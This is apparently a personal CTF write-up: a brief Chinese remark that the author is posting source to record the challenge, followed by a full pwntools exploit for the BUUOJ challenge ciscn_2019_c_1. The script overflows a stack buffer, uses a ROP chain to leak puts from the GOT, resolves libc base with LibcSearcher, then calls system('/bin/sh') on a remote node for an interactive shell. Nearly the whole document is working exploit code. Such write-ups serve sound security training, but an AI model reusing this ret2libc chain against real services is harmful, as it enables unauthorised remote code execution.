打字太累了 直接附源码 记录一下这题
注释的那段payload打不通 我感觉两种写法都一样 但不知道为什么不行
# Exploit script for the BUUOJ challenge ciscn_2019_c_1: a two-stage ROP chain
# that first leaks the resolved address of puts through puts@got, then returns
# into main and calls system("/bin/sh") with the libc offsets found by LibcSearcher.
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
# Remote target as given on the page; the local-process line is kept for testing.
p = remote("node4.buuoj.cn",'25444')
#p = process("./ciscn_2019_c_1")
elf = ELF("./ciscn_2019_c_1")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
# Absolute 0x400... addresses, so the binary is presumably built without PIE -- confirm with checksec.
main_addr = 0x400B28   # return here after the leak so the overflow can be reused
pop_rdi = 0x400c83     # `pop rdi ; ret` gadget
ret = 0x4006b9         # plain `ret` gadget
p.recvuntil('choice!\n')
p.sendline(b'1')
# NOTE: the commented chain below is NOT equivalent to the working one. The
# padding has the same length either way (1 + 0x4f + 8 = 0x58 bytes), but
# puts_plt and puts_got are swapped: here `pop rdi` loads puts_plt as the
# argument and then returns into puts_got, whereas the working chain passes
# puts_got in rdi and returns into puts_plt. `r` on the following line is also
# not defined anywhere in this script (the connection is named `p`).
#payload =b'\0' + b'a'*(0x50-1) +p64(0) +p64(pop_rdi) +p64(puts_plt) +p64(puts_got) +p64(main_addr)
#r.sendlineafter('choice!\n',b'1')
# Leading NUL byte: presumably so the program's "encrypt" step stops at the
# first byte and leaves the rest of the buffer untouched -- verify in the binary.
payload=b'\0'+b'a'*(0x50-1 +8) #+#p64(0)
payload+=p64(pop_rdi)
payload+=p64(puts_got)   # rdi = address of puts@got
payload+=p64(puts_plt)   # puts(puts@got) prints the resolved libc address
payload+=p64(main_addr)  # back to main for the second stage
p.sendlineafter('encrypted\n',payload)
# Two lines of program output precede the leaked address.
p.recvline()
p.recvline()
# The leak arrives as fewer than 8 bytes; strip the newline and NUL-pad before u64.
puts_addr=u64(p.recvuntil(b'\n')[:-1].ljust(8,b'\0'))
print(puts_addr)  # printed in decimal; hex(puts_addr) would be easier to compare
# Identify the remote libc from the leaked puts address; `offest` (sic) is the libc base.
libc=LibcSearcher('puts',puts_addr)
offest =puts_addr - libc.dump('puts')
libc_sys = libc.dump('system')
sys_addr = offest + libc_sys
bin_sh =offest + libc.dump('str_bin_sh')
# Second stage: same menu choice and same overflow, now calling system("/bin/sh").
p.recvuntil('choice!\n')
p.sendline(b'1')
payload=b'\0'+b'a'*(0x50-1+8)
# The extra `ret` before pop_rdi is commonly used to keep the stack 16-byte
# aligned when entering system(); presumably that is its purpose here -- confirm.
payload+=p64(ret)
payload+=p64(pop_rdi)
payload+=p64(bin_sh)     # rdi = address of "/bin/sh" in libc
payload+=p64(sys_addr)   # system(rdi)
p.sendlineafter('encrypted\n',payload)
p.interactive()